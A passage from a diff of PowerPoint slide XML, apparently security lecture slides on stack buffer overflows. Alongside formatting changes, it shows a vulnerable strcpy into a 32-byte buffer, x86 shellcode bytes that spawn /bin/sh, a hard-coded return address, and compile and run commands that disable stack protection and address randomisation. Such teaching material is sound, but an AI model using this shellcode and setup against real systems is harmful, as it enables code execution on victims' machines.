-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>pwned</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" b="1" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  Hello world!</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr marL="0" indent="0">
@@ -16413,21 +17686,37 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>  Hello world!</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
               <a:t>  ...</a:t>
             </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Slide Number Placeholder 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC7E8864-36E1-4ABE-BB9E-BF082564B114}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>53</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -16561,6 +17850,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D934C5E2-7CDD-4C3A-9D14-F6BDE11CE7D0}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>54</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -16746,6 +18064,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F99AC5E-4909-4379-B0D7-E2C3F98CC2FA}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>55</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -16987,6 +18334,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9411C1E-D413-45A8-A79C-2EA0BE521325}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>56</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -17071,6 +18447,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69F8B323-23BA-466B-95B9-E2C0AE0E4277}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>57</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -17218,6 +18623,35 @@
               </a:rPr>
               <a:t>}</a:t>
             </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28C220D8-D3FA-4C05-BD42-321172D72AA8}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>58</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -17698,6 +19132,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Slide Number Placeholder 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71049C5C-8B7E-47E6-B43F-BCF46B406491}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>59</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -17808,21 +19271,7 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>  char </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>buf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>[32];</a:t>
+              <a:t>  char buf[32];</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -17834,35 +19283,7 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>strcpy</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>buf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>, code);</a:t>
+              <a:t>  strcpy(buf, code);</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -17930,47 +19351,8 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>  "\x31\xc0"    // </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>xorl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> %</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>eax</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>, %</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>eax</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
+              <a:t>  "\x31\xc0"    // xorl %eax, %eax</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr marL="0" indent="0">
@@ -17981,33 +19363,8 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>  "\x50"        // </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>pushl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> %</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>eax</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
+              <a:t>  "\x50"        // pushl %eax</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr marL="0" indent="0">
@@ -18018,35 +19375,7 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>  "\x68""//</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>sh</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>"  // </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>pushl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> $0x68732f2f</a:t>
+              <a:t>  "\x68""//sh"  // pushl $0x68732f2f</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -18058,21 +19387,7 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>  "\x68""/bin"  // </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>pushl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> $0x6e69622f</a:t>
+              <a:t>  "\x68""/bin"  // pushl $0x6e69622f</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -18120,49 +19435,7 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>  "\x0c\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>xde</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>xff</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>xff</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>"</a:t>
+              <a:t>  "\x0c\xde\xff\xff"</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -18380,49 +19653,7 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>$ CFLAGS=‘-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>Wl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>,-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>z,execstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fno</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-stack-protector –w’</a:t>
+              <a:t>$ CFLAGS=‘-Wl,-z,execstack -fno-stack-protector –w’</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -18447,21 +19678,7 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>$ for </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> in `seq 1 128`; do</a:t>
+              <a:t>$ for i in `seq 1 128`; do</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -18474,19 +19691,8 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>  echo PAD=$</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
+              <a:t>  echo PAD=$i</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr marL="0" indent="0">
@@ -18498,33 +19704,8 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>gcc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -m32 -DPAD="\"$PAD\"" -march=i686 $CFLAGS </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>repro.c</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
+              <a:t>  gcc -m32 -DPAD="\"$PAD\"" -march=i686 $CFLAGS repro.c</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr marL="0" indent="0">
@@ -18536,47 +19717,8 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>setarch</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -R env -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> ./</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>a.out</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
+              <a:t>  setarch -R env -i ./a.out</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr marL="0" indent="0">
@@ -18588,21 +19730,7 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>  PAD="$PAD\\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
